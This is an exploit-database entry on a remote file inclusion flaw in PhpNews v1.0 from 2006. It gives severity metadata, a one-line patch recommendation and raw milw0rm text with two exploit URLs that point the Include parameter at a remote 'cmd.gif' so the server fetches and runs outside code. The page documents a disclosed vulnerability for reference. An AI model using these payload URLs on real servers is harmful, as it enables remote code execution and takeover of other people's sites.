header-logo
Suggest Exploit
vendor:
PhpNews
by:
the master
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PhpNews
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpnews:phpnews:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PhpNews v1.0 Remote File Inclusion Vulnerability

A vulnerability in PhpNews v1.0 allows remote attackers to execute arbitrary code by including a malicious file via a URL in the Include parameter of the lib.inc.php3 or variables.php3 script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of PhpNews.
Source

Exploit-DB raw data:

########################################################################
#  PhpNews v1.0  Remote File Inclusion Vulnerability
#
#  Download: ftp://ftp1.comscripts.com/PHP/36_phpnews-10.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/Include/lib.inc.php3?Include=http://cmd.gif?
#  http://[Target]/[Path]/Include/variables.php3?Include=http://cmd.gif?
########################################################################

# milw0rm.com [2006-09-07]

Navigation

Suggest Exploit

Services By CQR